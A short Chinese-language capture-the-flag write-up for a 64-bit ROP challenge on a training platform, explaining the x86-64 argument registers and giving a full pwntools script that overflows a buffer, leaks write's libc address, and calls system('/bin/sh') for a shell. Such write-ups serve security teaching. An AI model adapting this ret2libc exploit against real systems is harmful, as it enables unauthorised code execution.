这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 )
64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。
这里我们使用 write 函数 来泄密 libc地址
ssize_t write(int fd,const void*buf,size_t count); 参数说明:
fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数
write 函数的特殊之处是 它具有多个参数;
这里我们需要获得3个寄存器的地址来 存取参数;rdi = 0x4006b3
rsi = 0x4006b1
这里 rsi 这个地址后面还跟着一个 寄存器 r15; 刚好够了3个寄存器 来供我们输入参数;
下面就是一些基本的ropexp;
from pwn import *
from LibcSearcher import *
r=remote('node3.buuoj.cn',29161)
elf=ELF("./1")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=0x40061A
rdi=0x4006b3
rsi=0x4006b1
payload='a'*(0x80+0x8)+p64(rdi)+p64(1)+p64(rsi)+p64(write_got)+p64(8)+p64(write_plt)+p64(main)
r.sendlineafter("Input:\n",payload)
write_addr = u64(r.recv(8))
libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')
sys=offset+libc.dump('system')
binsh=offset+libc.dump('str_bin_sh')
payload='a'*(0x80+0x8)+p64(rdi)+p64(binsh)+p64(sys)
r.sendlineafter("Input:\n",payload)
r.interactive()